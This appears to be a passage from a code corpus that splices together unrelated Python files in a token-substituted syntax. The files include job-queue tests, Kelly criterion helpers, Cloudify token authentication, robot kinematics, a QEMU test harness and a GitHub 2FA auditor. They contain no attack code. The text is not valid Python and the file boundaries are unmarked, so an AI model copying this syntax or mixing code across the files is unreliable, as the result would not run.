"cc"])<assert_stmt>Queue(p_queue).size()<eq>1<line_sep>worker.stop_deps()<block_end><def_stmt>test_raw_exception worker<block_start>p_queue="testexception_raw"<line_sep>worker.start(flags="--greenlets 10 --config tests/fixtures/config-raw1.py" queues=p_queue)<line_sep>jobs_collection=worker.mongodb_jobs.mrq_jobs<assert_stmt>jobs_collection.count()<eq>0<assert_stmt>Queue(p_queue).size()<eq>0<line_sep>worker.send_raw_tasks(p_queue ["msg1"] block=<true>)<line_sep>failjob=list(jobs_collection.find())[0]<assert_stmt>Queue("default").size()<eq>0<assert_stmt>Queue(p_queue).size()<eq>0<assert_stmt>jobs_collection.count()<eq>1<assert_stmt>failjob["status"]<eq>"failed"<line_sep>worker.stop(deps=<false>)<line_sep>worker.start(deps=<false> flags="--greenlets 10 --config tests/fixtures/config-raw1.py" queues="default")<line_sep>worker.send_task("mrq.basetasks.utils.JobAction" {"id":failjob["_id"] "action":"requeue"} block=<true>)<assert_stmt>Queue("default").size()<eq>0<assert_stmt>Queue(p_queue).size()<eq>0<assert_stmt>jobs_collection.count()<eq>2<assert_stmt>list(jobs_collection.find({"_id":failjob["_id"]}))[0]["status"]<eq>"queued"<assert_stmt>list(jobs_collection.find({"_id":{"$ne":failjob["_id"]}}))[0]["status"]<eq>"success"<line_sep>worker.stop(deps=<false>)<line_sep>worker.start(deps=<false> flags="--greenlets 10 --config tests/fixtures/config-raw1.py" queues="default testx")<line_sep>worker.wait_for_idle()<assert_stmt>Queue(p_queue).size()<eq>0<assert_stmt>jobs_collection.count()<eq>2<assert_stmt>Queue("testx").size()<eq>0<assert_stmt>list(jobs_collection.find({"_id":failjob["_id"]}))[0]["status"]<eq>"failed"<block_end><def_stmt>test_raw_retry worker<block_start>p_queue="testretry_raw"<line_sep>worker.start(flags="--greenlets 10 --config tests/fixtures/config-raw1.py" queues=p_queue)<line_sep>jobs_collection=worker.mongodb_jobs.mrq_jobs<assert_stmt>jobs_collection.count()<eq>0<assert_stmt>Queue(p_queue).size()<eq>0<line_sep>worker.send_raw_tasks(p_queue [0] block=<true>)<line_sep>failjob=list(jobs_collection.find())[0]<assert_stmt>Queue("default").size()<eq>0<assert_stmt>Queue("testx").size()<eq>1<assert_stmt>Queue(p_queue).size()<eq>0<assert_stmt>jobs_collection.count()<eq>1<assert_stmt>failjob["status"]<eq>"queued"<assert_stmt>failjob["queue"]<eq>"testx"<block_end>@pytest.mark.parametrize(["p_queue" "p_greenlets"] [x1+x2<for>x1 [["test_raw default test"] # ["default test_raw test"], # ["default test_raw test_set"], # ["test_set test_raw default"], # ["test test2 test_set test_raw default"] ]<for>x2 [# [1], [2] # [10] ]])<def_stmt>test_raw_mixed worker p_queue p_greenlets<block_start>worker.start_deps()<line_sep>worker.send_raw_tasks("test_raw" ["aaa" "bbb" "ccc"] start=<false> block=<false>)<line_sep>worker.send_task("tests.tasks.general.MongoInsert" {"not_raw":"ddd"} start=<false> block=<false>)<assert_stmt>Queue("test_raw").size()<eq>3<assert_stmt>Queue("default").size()<eq>1<line_sep>worker.start(flags="--greenlets %s --config tests/fixtures/config-raw1.py"%p_greenlets queues=p_queue deps=<false>)<line_sep>test_collection=worker.mongodb_logs.tests_inserts<line_sep>jobs_collection=worker.mongodb_jobs.mrq_jobs<line_sep>time.sleep(3)<assert_stmt>Queue("test_raw").size()<eq>0<assert_stmt>Queue("default").size()<eq>0<assert_stmt>test_collection.count()<eq>4<assert_stmt>jobs_collection.count()<eq>4<assert_stmt>jobs_collection.find({"status":"success"}).count()<eq>4<assert_stmt>list(jobs_collection.find({"status":"success"}))[0]["worker"]<block_end><def_stmt>test_raw_no_storage worker<block_start>""" Test tasks that don't store unless they go to error status like 'failed' """<line_sep>worker.start(flags="--config tests/fixtures/config-raw1.py" queues="default testnostorage_raw")<line_sep>jobs_collection=worker.mongodb_jobs.mrq_jobs<line_sep>test_collection=worker.mongodb_logs.tests_inserts<line_sep>worker.send_raw_tasks("testnostorage_raw" ["tests.tasks.general.MongoInsert 3"] block=<false>)<line_sep>time.sleep(2)<line_sep># No started inserted. <assert_stmt>jobs_collection.count()<eq>0<line_sep>time.sleep(2)<line_sep># No success either, but we did insert <assert_stmt>test_collection.count()<eq>1<assert_stmt>jobs_collection.count()<eq>0<line_sep>test_collection.remove({})<line_sep># However failed tasks get stored. worker.send_raw_tasks("testnostorage_raw" ["tests.tasks.general.RaiseException 0"] block=<false>)<line_sep>time.sleep(2)<line_sep># Failed was inserted. <assert_stmt>jobs_collection.count({"status":"failed" "path":"tests.tasks.general.RaiseException"})<eq>1<line_sep># If we requeue and don't raise, should be OK and inserted this time, even in success # no_storage depends on a raw queue, not a task path. _id=jobs_collection.find_one()["_id"]<line_sep>jobs_collection.update({"_id":_id} {"$set":{"path":"tests.tasks.general.MongoInsert"}})<line_sep>job=Job(_id).fetch(full_data=<true>)<line_sep>job.requeue(queue="default")<line_sep>time.sleep(1)<assert_stmt>test_collection.count()<eq>1<assert_stmt>jobs_collection.count()<eq>1<assert_stmt>jobs_collection.count({"status":"success"})<eq>1<line_sep>jobs_collection.remove({})<line_sep># Test with retry: should be inserted worker.send_raw_tasks("testnostorage_raw" ["tests.tasks.general.Retry 0"] block=<false>)<assert_stmt>jobs_collection.count({"status":"started"})<eq>0<line_sep>time.sleep(2)<assert_stmt>jobs_collection.count({"status":"retry"})<eq>1<block_end>
# Copyright 2016-present CERN – European Organization for Nuclear Research # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_from_stmt>qf_lib.containers.series.qf_series QFSeries<import_from_stmt>qf_lib.containers.series.simple_returns_series SimpleReturnsSeries<def_stmt>kelly qf_series:QFSeries<arrow>float<block_start>""" Calculates the value of the Kelly Criterion (the fraction of money that should be invested) for the series of returns/prices. Kelly Criterion assumptions: 1. You trade the same way you traded in the past. 2. Each return corresponds to one trade. 3. Returns are normally distributed (calculated value will be close to the ideal kelly value even for highly skewed returns. Test showed that the difference of up to 10% (relative) might occur for extremely skewed distributions. Parameters ---------- qf_series: QFSeries timeseries of returns/prices. Each return/price must correspond to one trade. Returns ------- float fraction of money that should be invested """<line_sep># it is important to convert a series to simple returns and not log returns returns_tms=qf_series.to_simple_returns()# type: SimpleReturnsSeries mean=returns_tms.mean()<line_sep>variance=returns_tms.var()<line_sep>kelly_criterion_value=mean/variance<line_sep><return>kelly_criterion_value<block_end><def_stmt>kelly_binary win_probability:float win_size:float lose_size:float<arrow>float<block_start>""" Calculates the value of the Kelly Criterion (the fraction of money that should be invested) for a bet that has two possible outcomes. NOTE: This method should not be used to estimate the kelly value for a timeseries. Parameters ---------- win_probability:float probability of winning. Assumes that probability of losing is 1 - win_probability. win_size: float gain if we win. For example: 0.7 means that we get additional 70% of what we bet. (if we bet 10$ and we win we now have 17$) new_value = old_value * (1 + win_size) lose_size: float lose if we lose. This value should be negative. For example: -0.2 means that we lose 20% of what we bet. (if we bet 10$ and we lose we now have 8$) new_value = old_value * (1 + lose_size) Returns ------- float fraction of money that should be invested """<line_sep>kelly_value=(-win_size<times>win_probability+lose_size<times>win_probability-lose_size)/(win_size<times>lose_size)<line_sep><return>kelly_value<block_end>
<import_from_stmt>..render engine<class_stmt>ChartMixin<block_start><def_stmt>add_js_funcs self *fns<block_start><for_stmt>fn fns<block_start>self.js_functions.add(fn)<block_end><return>self<block_end><def_stmt>load_javascript self<block_start><return>engine.load_javascript(self)<block_end><block_end><class_stmt>CompositeMixin(ChartMixin)<block_start><def_stmt>__iter__ self<block_start><for_stmt>chart self._charts<block_start><yield>chart<block_end><block_end><def_stmt>__len__ self<block_start><return>len(self._charts)<block_end><block_end>
# Generated by Django 2.1.5 on 2019-05-31 09:14 <import_from_stmt>django.db migrations<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('oauth' '0002_auto_20190512_1129') ]<line_sep>operations=[migrations.AlterModelOptions(name='oauthconfig' options={'ordering':['-add_time'] 'verbose_name':'0-OAuth配置' 'verbose_name_plural':'0-OAuth配置'} ) migrations.AlterModelOptions(name='oauthuser' options={'ordering':['-add_time'] 'verbose_name':'1-Oauth用户' 'verbose_name_plural':'1-Oauth用户'} ) ]<block_end>
######### # Copyright (c) 2013 GigaSpaces Technologies Ltd. All rights reserved # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # * See the License for the specific language governing permissions and # * limitations under the License. <import_stmt>string<import_from_stmt>flask current_app<import_from_stmt>itsdangerous BadSignature SignatureExpired<import_from_stmt>..storage.idencoder get_encoder<import_from_stmt>cloudify.constants CLOUDIFY_API_AUTH_TOKEN_HEADER<import_from_stmt>manager_rest.storage.models User<import_from_stmt>manager_rest.manager_exceptions NotFoundError<import_from_stmt>manager_rest.storage user_datastore get_storage_manager<import_from_stmt>manager_rest.execution_token set_current_execution get_current_execution_by_token get_execution_token_from_request <line_sep>ENCODED_ID_LENGTH=5<def_stmt>user_loader request<block_start>"""Attempt to retrieve the current user from the request Either from request's Authorization attribute, or from the token header Having this function makes sure that this will work: > from flask_security import current_user > current_user <manager_rest.storage.models.User object at 0x50d9d10> :param request: flask's request :return: A user object, or None if not found """<if_stmt>request.authorization<block_start><return>get_user_from_auth(request.authorization)<block_end>execution_token=get_execution_token_from_request(request)<if_stmt>execution_token<block_start>execution=get_current_execution_by_token(execution_token)<line_sep>set_current_execution(execution)# Sets the request current execution <return>execution.creator<if>execution<else><none><block_end>token=get_token_from_request(request)<if_stmt>token<block_start>_,_,user,_,_=get_token_status(token)<line_sep><return>user<block_end>api_token=get_api_token_from_request(request)<if_stmt>api_token<block_start>user,user_token_key=extract_api_token(api_token)<line_sep><return>user<block_end><if_stmt>current_app.external_auth<and>current_app.external_auth.can_extract_user_from_request()<block_start>user=current_app.external_auth.get_user_from_request(request)<if_stmt>isinstance(user User)<block_start><return>user<block_end><block_end><return><none><block_end><def_stmt>extract_api_token api_token<block_start>user_id=api_token[:ENCODED_ID_LENGTH]<line_sep>user_token_key=api_token[ENCODED_ID_LENGTH:]<line_sep>user_id=get_encoder().decode(user_id)<try_stmt><block_start>user=get_storage_manager().get(User user_id)<block_end><except_stmt>NotFoundError<block_start><return><none> <none><block_end><return>user user_token_key<block_end><def_stmt>get_user_from_auth auth<block_start><if_stmt><not>auth<or><not>auth.username<block_start><return><none><block_end><if_stmt>auth.username[0]<not><in>string.ascii_letters<block_start><return><none><block_end><return>user_datastore.get_user(auth.username)<block_end><def_stmt>get_token_from_request request<block_start>token_auth_header=current_app.config['SECURITY_TOKEN_AUTHENTICATION_HEADER']<line_sep><return>request.headers.get(token_auth_header)<block_end><def_stmt>get_api_token_from_request request<block_start><return>request.headers.get(CLOUDIFY_API_AUTH_TOKEN_HEADER)<block_end><def_stmt>get_token_status token<block_start>"""Mimic flask_security.utils.get_token_status with some changes :param token: The token to decrypt :return: A tuple: (expired, invalid, user, data) """<line_sep>security=current_app.extensions['security']<line_sep>serializer=security.remember_token_serializer<line_sep>max_age=security.token_max_age<line_sep>user,data,error=<none> <none> <none><line_sep>expired,invalid=<false> <false><try_stmt><block_start>data=serializer.loads(token max_age=max_age)<block_end><except_stmt>SignatureExpired<block_start>expired=<true><block_end><except_stmt>(BadSignature TypeError ValueError)<as>e<block_start>invalid=<true><line_sep>error=e<block_end><if_stmt>data<block_start>user=user_datastore.find_user(id=data[0])<block_end><return>expired invalid user data error<block_end>
<import_stmt>sympy<line_sep>_id=<lambda>x:x<class_stmt>Kinematics(object)<block_start>"""Robot symbolic Jacobians. kinobj.J: list of link frame Jacobians - complete (6 x N): [linear_velocity angular_velocity] = J * joint_velocities kinobj.Jc: list of link center-of-mass Jacobians - complete kinobj.Jp: list of link frame Jacobians - linear velocity part only kinobj.Jo: list of link frame Jacobians - angular velocity part only kinobj.Jcp: list of link center-of-mass Jacobians - linear part kinobj.Jco: list of link center-of-mass Jacobians - angular part """<def_stmt>__init__ self robotdef geom ifunc=<none><block_start><if_stmt><not>ifunc<block_start>ifunc=_id<block_end>self.rbtdef=robotdef<line_sep>self.geom=geom<line_sep>self.dof=self.rbtdef.dof<def_stmt>sym_skew v<block_start><return>sympy.Matrix([[0 -v[2] v[1]] [v[2] 0 -v[0]] [-v[1] v[0] 0]])<block_end><if_stmt>self.rbtdef._dh_convention<eq>'standard'# extend z and p so that z[-1] and p[-1] return values from base # frame <block_start>z_ext=geom.z+[sympy.Matrix([0 0 1])]<line_sep>p_ext=geom.p+[sympy.zeros(3 1)]<line_sep>self.Jp=list(range(self.rbtdef.dof))<for_stmt>l range(self.rbtdef.dof)<block_start>self.Jp[l]=sympy.zeros(3 self.rbtdef.dof)<for_stmt>j range(l+1)<block_start><if_stmt>self.rbtdef._links_sigma[j]<block_start>self.Jp[l][0:3 j]=ifunc(z_ext[j-1])<block_end><else_stmt><block_start>self.Jp[l][0:3 j]=ifunc(z_ext[j-1].cross((p_ext[l]-p_ext[j-1])).reshape(3 1))<block_end><block_end><block_end>self.Jo=list(range(self.rbtdef.dof))<for_stmt>l range(self.rbtdef.dof)<block_start>self.Jo[l]=sympy.zeros(3 self.rbtdef.dof)<for_stmt>j range(l+1)<block_start><if_stmt>self.rbtdef._links_sigma[j]<block_start>self.Jo[l][0:3 j]=sympy.zeros(3 1)<block_end><else_stmt><block_start>self.Jo[l][0:3 j]=ifunc(z_ext[j-1])<block_end><block_end><block_end><block_end><elif_stmt>self.rbtdef._dh_convention<eq>'modified'<block_start>self.Jp=list(range(self.rbtdef.dof))<for_stmt>l range(self.rbtdef.dof)<block_start>self.Jp[l]=sympy.zeros(3 self.rbtdef.dof)<for_stmt>j range(l+1)<block_start><if_stmt>self.rbtdef._links_sigma[j]<block_start>self.Jp[l][0:3 j]=ifunc(geom.z[j])<block_end><else_stmt><block_start>self.Jp[l][0:3 j]=ifunc(geom.z[j].cross((geom.p[l]-geom.p[j])).reshape(3 1))<block_end><block_end><block_end>self.Jo=list(range(self.rbtdef.dof))<for_stmt>l range(self.rbtdef.dof)<block_start>self.Jo[l]=sympy.zeros(3 self.rbtdef.dof)<for_stmt>j range(l+1)<block_start><if_stmt>self.rbtdef._links_sigma[j]<block_start>self.Jo[l][0:3 j]=sympy.zeros(3 1)<block_end><else_stmt><block_start>self.Jo[l][0:3 j]=ifunc(geom.z[j])<block_end><block_end><block_end><block_end>self.J=list(range(self.rbtdef.dof))<for_stmt>l range(self.rbtdef.dof)<block_start>self.J[l]=self.Jp[l].col_join(self.Jo[l])<block_end>self.Jcp=list(range(self.rbtdef.dof))<line_sep>self.Jco=self.Jo<for_stmt>l range(self.rbtdef.dof)<block_start>self.Jcp[l]=ifunc(self.Jp[l]-sym_skew(geom.R[l]<times>sympy.Matrix(self.rbtdef.l[l]))<times>self.Jo[l])<block_end>self.Jc=list(range(self.rbtdef.dof))<for_stmt>l range(self.rbtdef.dof)<block_start>self.Jc[l]=self.Jcp[l].col_join(self.Jco[l])<block_end><block_end><block_end>
<import_from_stmt>django.templatetags.static static<import_from_stmt>django.utils.functional lazy<line_sep>static_lazy=lazy(static str)<line_sep>
# -- coding: utf-8 -- # # Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights # Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). # You may not use this file except in compliance with the License. # A copy of the License is located at # # http://aws.amazon.com/apache2.0/ # # or in the "license" file accompanying this file. This file is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS # OF ANY KIND, either express or implied. See the License for the # specific language governing permissions and limitations under the # License. # <import_stmt>os<import_stmt>typing<import_from_stmt>ask_sdk_runtime.view_resolvers AbstractTemplateEnumerator<import_from_stmt>ask_sdk_core.utils.view_resolver split_locale<if_stmt>typing.TYPE_CHECKING<block_start><import_from_stmt>typing Iterator Type<import_from_stmt>ask_sdk_core.handler_input HandlerInput<block_end><class_stmt>LocaleTemplateEnumerator(AbstractTemplateEnumerator)<block_start>"""Enumerator to enumerate template name based on locale property. Enumerate possible combinations of template name and given locale from the HandlerInput. For Example: For locale: 'en-US' and a response template name "template", the following combinations will be generated: template/en/US template/en_US template/en template_en_US template_en template """<line_sep>__instance=<none><def_stmt>__new__ cls# type: (Type[object]) -> LocaleTemplateEnumerator <block_start>"""Creating a singleton class to re-use same enumerator instance for different locale and template values. """<if_stmt>LocaleTemplateEnumerator.__instance<is><none><block_start>LocaleTemplateEnumerator.__instance=object.__new__(cls)<block_end><return>LocaleTemplateEnumerator.__instance<block_end><def_stmt>__init__ self# type: () -> None <block_start>"""Enumerator to generate different path combinations for a given locale to load the template. """<line_sep><pass><block_end><def_stmt>generate_combinations self handler_input template_name# type: (HandlerInput, str) -> Iterator[str] <block_start>"""Create a generator object to iterate over different combinations of template name and locale property. :param handler_input: Handler Input instance with Request Envelope containing Request. :type handler_input: :py:class:`ask_sdk_core.handler_input.HandlerInput` :param template_name: Template name which needs to be loaded :type template_name: str :return: Generator object which returns relative paths of the template file :rtype: Iterator[str] """<line_sep>locale=handler_input.request_envelope.request.locale<line_sep>language,country=split_locale(locale=locale)<if_stmt><not>language<and><not>country<block_start><yield>template_name<block_end><else_stmt><block_start><yield>os.path.join(template_name language country)<line_sep><yield>os.path.join(template_name (language+"_"+country))<line_sep><yield>os.path.join(template_name language)<line_sep><yield>(template_name+"_"+language+"_"+country)<line_sep><yield>(template_name+"_"+language)<line_sep><yield>template_name<block_end><block_end><block_end>
# Copyright 2017 Netflix # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ .. module: security_monkey.watchers.github.org :platform: Unix :synopsis: Auditor for GitHub Organizations .. version:: $$VERSION$$ .. moduleauthor:: <NAME> <<EMAIL>> """<import_from_stmt>security_monkey.auditor Auditor<import_from_stmt>security_monkey.watchers.github.org GitHubOrg<class_stmt>GitHubOrgAuditor(Auditor)<block_start>index=GitHubOrg.index<line_sep>i_am_singular=GitHubOrg.i_am_singular<line_sep>i_am_plural=GitHubOrg.i_am_plural<def_stmt>__init__ self accounts=<none> debug=<false><block_start>super(GitHubOrgAuditor self).__init__(accounts=accounts debug=debug)<block_end><def_stmt>check_for_public_repo self org_item<block_start>""" Organizational view that it has public repositories. Default score of 0. This is mostly informational. :param org_item: :return: """<line_sep>tag="Organization contains public repositories."<if_stmt>org_item.config["public_repos"]<g>0<block_start>self.add_issue(0 tag org_item notes="Organization contains public repositories")<block_end><block_end><def_stmt>check_for_non_twofa_members self org_item<block_start>""" Alert if the org has users that don't have 2FA enabled. Will keep this at a level of 2 -- unles there are admins without 2FA, then that is level 10! :param org_item: :return: """<line_sep>tag="Organization contains users without 2FA enabled."<line_sep>owner_no_twofa="Organization owner does NOT have 2FA enabled!"<if_stmt>len(org_item.config["no_2fa_members"])<g>0<block_start>self.add_issue(2 tag org_item notes="Organization contains users without 2FA enabled")<for_stmt>notwofa org_item.config["no_2fa_members"]<block_start><if_stmt>notwofa<in>org_item.config["owners"]<block_start>self.add_issue(10 owner_no_twofa org_item notes="Organization OWNER: {} does NOT "<concat>"have 2FA enabled!".format(notwofa))<block_end><block_end><block_end><block_end><block_end>
<import_from_stmt>pathlib Path<import_stmt>numpy<as>np<import_stmt>pandas<as>pd<import_from_stmt>sklearn.datasets fetch_openml<import_from_stmt>npt.datasets.base BaseDataset<class_stmt>IncomeDataset(BaseDataset)<block_start><def_stmt>__init__ self c<block_start>super().__init__(fixed_test_set_index=-99762)<line_sep>self.c=c<block_end><def_stmt>load self<block_start>"""KDD Income Dataset Possibly used in VIME and TabNet. There are multiple datasets called income. https://archive.ics.uci.edu/ml/datasets/census+income https://archive.ics.uci.edu/ml/datasets/Census-Income+%28KDD%29 The KDD One is significantly larger than the other one. We will take KDD one. Both TabNet and VIME are not super explicit about which dataset they use. TabNet cite Oza et al "Online Bagging and Boosting", which use the bigger one. So we will start with that. (But there is no full TabNet Code to confirm.) Binary classification. Target in last column. 299.285 rows. 42 attributes. Use get_num_cat_auto to assign. 1 target """<line_sep># Load data from https://www.openml.org/d/4535 data_home=Path(self.c.data_path)/self.c.data_set<line_sep>data=fetch_openml('Census-income' version=1 data_home=data_home)<line_sep># target in 'data' self.data_table=data['data']<if_stmt>isinstance(self.data_table np.ndarray)<block_start><pass><block_end><elif_stmt>isinstance(self.data_table pd.DataFrame)<block_start>self.data_table=self.data_table.to_numpy()<block_end>self.N=self.data_table.shape[0]<line_sep>self.D=self.data_table.shape[1]<line_sep># Target col is the last feature # last column is target (V42) # (binary classification, if income > or < 50k) self.num_target_cols=[]<line_sep>self.cat_target_cols=[self.D-1]<line_sep>self.num_features,self.cat_features=BaseDataset.get_num_cat_auto(self.data_table cutoff=55)<line_sep>print('income num cat features')<line_sep>print(len(self.num_features))<line_sep>print(len(self.cat_features))<line_sep># TODO: add missing entries to sanity check self.missing_matrix=np.zeros((self.N self.D) dtype=np.bool_)<line_sep>self.is_data_loaded=<true><line_sep>self.tmp_file_or_dir_names=['openml']<block_end><block_end>
# Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. <import_stmt>aiounittest<import_from_stmt>botbuilder.core MemoryStorage TurnContext PrivateConversationState<import_from_stmt>botbuilder.core.adapters TestAdapter<import_from_stmt>botbuilder.schema Activity ChannelAccount ConversationAccount<line_sep>RECEIVED_MESSAGE=Activity(text="received" type="message" channel_id="test" conversation=ConversationAccount(id="convo") from_property=ChannelAccount(id="user") )<class_stmt>TestPrivateConversationState(aiounittest.AsyncTestCase)<block_start><async_keyword><def_stmt>test_should_load_and_save_state_from_storage self<block_start>storage=MemoryStorage()<line_sep>adapter=TestAdapter()<line_sep>context=TurnContext(adapter RECEIVED_MESSAGE)<line_sep>private_conversation_state=PrivateConversationState(storage)<line_sep># Simulate a "Turn" in a conversation by loading the state, # changing it and then saving the changes to state. <await>private_conversation_state.load(context)<line_sep>key=private_conversation_state.get_storage_key(context)<line_sep>state=private_conversation_state.get(context)<assert_stmt>state<eq>{} "State not loaded"<assert_stmt>key "Key not found"<line_sep>state["test"]="foo"<line_sep><await>private_conversation_state.save_changes(context)<line_sep># Check the storage to see if the changes to state were saved. items=<await>storage.read([key])<assert_stmt>key<in>items "Saved state not found in storage."<assert_stmt>items[key]["test"]<eq>"foo" "Missing test value in stored state."<block_end><block_end>
<import_stmt>pexpect<import_stmt>infra<class_stmt>Emulator(object)<block_start><def_stmt>__init__ self builddir downloaddir logtofile timeout_multiplier<block_start>self.qemu=<none><line_sep>self.downloaddir=downloaddir<line_sep>self.logfile=infra.open_log_file(builddir "run" logtofile)<line_sep># We use elastic runners on the cloud to runs our tests. Those runners # can take a long time to run the emulator. Use a timeout multiplier # when running the tests to avoid sporadic failures. self.timeout_multiplier=timeout_multiplier<block_end># Start Qemu to boot the system # # arch: Qemu architecture to use # # kernel: path to the kernel image, or the special string # 'builtin'. 'builtin' means a pre-built kernel image will be # downloaded from ARTEFACTS_URL and suitable options are # automatically passed to qemu and added to the kernel cmdline. So # far only armv5, armv7 and i386 builtin kernels are available. # If None, then no kernel is used, and we assume a bootable device # will be specified. # # kernel_cmdline: array of kernel arguments to pass to Qemu -append option # # options: array of command line options to pass to Qemu # <def_stmt>boot self arch kernel=<none> kernel_cmdline=<none> options=<none><block_start><if_stmt>arch<in>["armv7" "armv5"]<block_start>qemu_arch="arm"<block_end><else_stmt><block_start>qemu_arch=arch<block_end>qemu_cmd=["qemu-system-{}".format(qemu_arch) "-serial" "stdio" "-display" "none"]<if_stmt>options<block_start>qemu_cmd<augadd>options<block_end><if_stmt>kernel_cmdline<is><none><block_start>kernel_cmdline=[]<block_end><if_stmt>kernel<block_start><if_stmt>kernel<eq>"builtin"<block_start><if_stmt>arch<in>["armv7" "armv5"]<block_start>kernel_cmdline.append("console=ttyAMA0")<block_end><if_stmt>arch<eq>"armv7"<block_start>kernel=infra.download(self.downloaddir "kernel-vexpress")<line_sep>dtb=infra.download(self.downloaddir "vexpress-v2p-ca9.dtb")<line_sep>qemu_cmd<augadd>["-dtb" dtb]<line_sep>qemu_cmd<augadd>["-M" "vexpress-a9"]<block_end><elif_stmt>arch<eq>"armv5"<block_start>kernel=infra.download(self.downloaddir "kernel-versatile")<line_sep>qemu_cmd<augadd>["-M" "versatilepb"]<block_end><block_end>qemu_cmd<augadd>["-kernel" kernel]<block_end><if_stmt>kernel_cmdline<block_start>qemu_cmd<augadd>["-append" " ".join(kernel_cmdline)]<block_end>self.logfile.write("> starting qemu with '%s'\n"%" ".join(qemu_cmd))<line_sep>self.qemu=pexpect.spawn(qemu_cmd[0] qemu_cmd[1:] timeout=5<times>self.timeout_multiplier env={"QEMU_AUDIO_DRV":"none"})<line_sep># We want only stdout into the log to avoid double echo self.qemu.logfile_read=self.logfile<block_end># Wait for the login prompt to appear, and then login as root with # the provided password, or no password if not specified. <def_stmt>login self password=<none># The login prompt can take some time to appear when running multiple # instances in parallel, so set the timeout to a large value <block_start>index=self.qemu.expect(["buildroot login:" pexpect.TIMEOUT] timeout=60<times>self.timeout_multiplier)<if_stmt>index<ne>0<block_start>self.logfile.write("==> System does not boot")<line_sep><raise>SystemError("System does not boot")<block_end>self.qemu.sendline("root")<if_stmt>password<block_start>self.qemu.expect("Password:")<line_sep>self.qemu.sendline(password)<block_end>index=self.qemu.expect(["# " pexpect.TIMEOUT])<if_stmt>index<ne>0<block_start><raise>SystemError("Cannot login")<block_end>self.run("dmesg -n 1")<block_end># Run the given 'cmd' with a 'timeout' on the target # return a tuple (output, exit_code) <def_stmt>run self cmd timeout=-1<block_start>self.qemu.sendline(cmd)<if_stmt>timeout<ne>-1<block_start>timeout<augmul>self.timeout_multiplier<block_end>self.qemu.expect("# " timeout=timeout)<line_sep># Remove double carriage return from qemu stdout so str.splitlines() # works as expected. output=self.qemu.before.replace("\r\r" "\r").splitlines()[1:]<line_sep>self.qemu.sendline("echo $?")<line_sep>self.qemu.expect("# ")<line_sep>exit_code=self.qemu.before.splitlines()[2]<line_sep>exit_code=int(exit_code)<line_sep><return>output exit_code<block_end><def_stmt>stop self<block_start><if_stmt>self.qemu<is><none><block_start><return><block_end>self.qemu.terminate(force=<true>)<block_end><block_end>
# -*- coding: utf-8 -*- r""" Manipulate posteriors of Bernoulli/Beta experiments., for discounted Bayesian policies (:class:`Policies.DiscountedBayesianIndexPolicy`). """<import_from_future_stmt> division print_function# Python 2 compatibility __author__="<NAME>"<line_sep>__version__="0.9"<line_sep># Local imports <try_stmt><block_start><import_from_stmt>.Beta Beta bernoulliBinarization<import_from_stmt>.with_proba with_proba<block_end><except_stmt>(ImportError SystemError)<block_start><import_from_stmt>Beta Beta bernoulliBinarization<import_from_stmt>with_proba with_proba<block_end><try_stmt><block_start><import_from_stmt>numpy.random beta<as>betavariate# Faster! Yes! <block_end><except_stmt>ImportError<block_start><import_from_stmt>random betavariate<block_end><import_from_stmt>scipy.special btdtri<line_sep># --- Constants #: Default value for the discount factor :math:`\gamma\in(0,1)`. #: ``0.95`` is empirically a reasonable value for short-term non-stationary experiments. GAMMA=0.95<line_sep># --- Class <class_stmt>DiscountedBeta(Beta)<block_start>r""" Manipulate posteriors of Bernoulli/Beta experiments, for discounted Bayesian policies (:class:`Policies.DiscountedBayesianIndexPolicy`). - It keeps :math:`\tilde{S}(t)` and :math:`\tilde{F}(t)` the *discounted* counts of successes and failures (S and F). """<def_stmt>__init__ self gamma=GAMMA a=1 b=1<block_start>r""" Create a Beta posterior :math:`\mathrm{Beta}(\alpha, \beta)` with no observation, i.e., :math:`\alpha = 1` and :math:`\beta = 1` by default."""<assert_stmt>a<ge>0 "Error: parameter 'a' for Beta posterior has to be >= 0."# DEBUG self._a=a<assert_stmt>b<ge>0 "Error: parameter 'b' for Beta posterior has to be >= 0."# DEBUG self._b=b<line_sep>self.N=[0 0]#: List of two parameters [a, b] <assert_stmt>0<l>gamma<le>1 "Error: for a DiscountedBayesianIndexPolicy policy, the discount factor has to be in (0,1], but it was {}.".format(gamma)# DEBUG <if_stmt>gamma<eq>1<block_start>print("Warning: gamma = 1 is stupid, just use a regular Beta posterior!")# DEBUG <block_end>self.gamma=gamma<block_end>#: Discount factor :math:`\gamma\in(0,1)`. <def_stmt>__str__ self<block_start><return>r"DiscountedBeta(\alpha={:.3g}, \beta={:.3g})".format(self.N[1] self.N[0])<block_end><def_stmt>reset self a=<none> b=<none><block_start>"""Reset alpha and beta, both to 0 as when creating a new default DiscountedBeta."""<if_stmt>a<is><none><block_start>a=self._a<block_end><if_stmt>b<is><none><block_start>b=self._b<block_end>self.N=[0 0]<block_end><def_stmt>sample self<block_start>"""Get a random sample from the DiscountedBeta posterior (using :func:`numpy.random.betavariate`). - Used only by :class:`Thompson` Sampling and :class:`AdBandits` so far. """<line_sep><return>betavariate(self._a+self.N[1] self._b+self.N[0])<block_end><def_stmt>quantile self p<block_start>"""Return the p quantile of the DiscountedBeta posterior (using :func:`scipy.stats.btdtri`). - Used only by :class:`BayesUCB` and :class:`AdBandits` so far. """<line_sep><return>btdtri(self._a+self.N[1] self._b+self.N[0] p)<line_sep># Bug: do not 